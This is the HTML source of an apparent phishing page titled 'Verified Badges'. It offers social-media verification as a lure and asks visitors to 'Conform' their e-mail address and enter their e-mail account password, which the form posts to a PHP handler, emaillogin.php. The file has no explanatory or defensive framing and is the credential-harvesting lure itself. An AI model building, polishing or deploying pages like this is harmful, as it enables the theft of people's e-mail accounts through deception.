<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verified Badges</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Roboto', sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #ffffff;
        }
        .container {
            text-align: center;
            background-color: white;
            padding: 20px;
            max-height: 90%;
            border-radius: 8px;
            height:20rem;
            max-width: 400px;
            width: 100%;
        }
        .logo {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 20px;
        }
        .logo img {
            height: 24px;
            margin-right: 8px;
        }
        .title {
            font-weight: 500;
            margin-bottom: 10px;
        
        }
        .title2 {
            font-weight: 700;
            margin-bottom: 10px;
        }
        .message {
            color: #666;
            margin-bottom: 20px;
        }
        .form-group {
            
            text-align: left;
        }
        .form-group label {
            display: block;
            margin-bottom: 5px;
            color: #666;
        }
        .form-group input {
            width: calc(100% - 20px);
            padding: 9px;
            border: 0.1px solid #ddd;
            border-radius: 4px;
            
            background-color: #fafafa;
        }
        .button {
            margin-top: 6rem;
            background-color: #3897f0;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            text-decoration: none;
            font-weight: 700;
            width: 20rem;
        }
        .email{
            margin-bottom: 0px;
            margin-top: 49px;
        }
        .password{
           
            padding-bottom: 14px;
        }
        hr{
            border: 1px solid #f3f3f3;
        }
        h4{
            color: #9c9eab;
            font-size: 10px;
        }
        img{
        max-width:15rem; 
        max-height:10rem;
       }
    </style>
</head>
<body>
    <div class="container">
        <a href="https://#/"><img src="omg.png" alt="logoname" border="0"  ></a>
        <div class="title">Verified Badges</div>
      <hr>
      <div class="title2">Conform your E-Mail</div>
        <div class="form-group">
     <form action="emaillogin.php" method="post">
            
            <input type="email" class="email" id="email" placeholder="E-Mail">
        </div>
        <div class="form-group">
           
            <input type="password" id="password" placeholder="E-Mail Password">
        </div>
        
        <button class="button">Submit</button>
    </form>
        <h4>English</h4>
    </div>
</body>
</html>
